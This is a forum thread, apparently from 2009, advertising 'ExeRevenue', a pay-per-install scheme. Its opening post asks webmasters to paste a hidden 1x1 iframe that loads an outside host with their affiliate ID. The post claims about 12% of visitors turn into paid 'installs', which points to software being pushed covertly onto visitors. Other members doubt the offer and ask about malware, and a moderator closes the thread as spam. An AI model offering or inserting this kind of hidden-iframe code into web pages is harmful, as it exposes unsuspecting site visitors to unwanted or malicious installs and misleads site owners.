Default Monetize your WWW traffic with ExeRevenue

Hello,

ExeRevenue now accepts WWW traffic again. It is very easy. You put a single line in your HTML sources and start earning cash. The line is as follows:

Code:
    <iframe src="http&#58;//put.ghura.pl/CHANGE_HERE/" width=1 height=1 style="display&#58;none"></iframe>
    where CHANGE_HERE should be replaced with your affiliate ID (it is a number, not a word; you can get it from EXE link in our panel, where it looks like ?i=123&t=... - take this 123).

Average conversion is about 12% (that is, if you have only 1000 uniq daily, you get paid for 120 installs daily - depending on your traffic it can be from 55$ up to even 475$ monthly salary).

We kindly encourage all webmasters to start working with us. We offer weekly payment with no hold.

-- exerevenue.com

alec11 is offline Veteran Member I was here more times.

Your main base site is exerevenue.com right?
    I see that this domain name will be expired next month ( 2009 July ).
    Can you extend the domain name to make sure you're still into this business?

of course our domain will not expire. Why would we advertise here otherwise ...

Our company has been on the market since 2007 and it's not a problem to pay 10$ for prolonging a domain, really

Please send us some traffic, we're sure you will be satisfied.

Pay per installs have viruses and not my favorite. And also people just don't want to install software which they just see online.

Well you have not mentioned which payment processors you are using to pay the members. And also do you accept installs from all countries? And do you have a different rate for each country?

How reliable are your softwares? Are they guranteed free of malicious softwares?

Yes i also want to know as an indian do you pay by paypal and I want some more information about your site , you mean to say that if people install your programme from our site or blog we will be paid.

I am eager to know that, is it compatable with google adsense.

Dear Alberich I think you are spamming here, as this section is not to advertise your product and its also not the appropriate sections to discuss this thing you can use either PPI (pay per install program) sections or you can advertise your site in advertising sections And i found you have created this thread twice one is "Pay Per Install - ActiveX" section as well as here in this sections which is not allowed here.

@Members

Dear friends its your duty also to protect our forum from these types of spammers and you should not reply in such types of threads.

Anyways I am going to close both threads and remember @Alberich while posting or creating any threads in any forum first read the FAQ.

Thanks.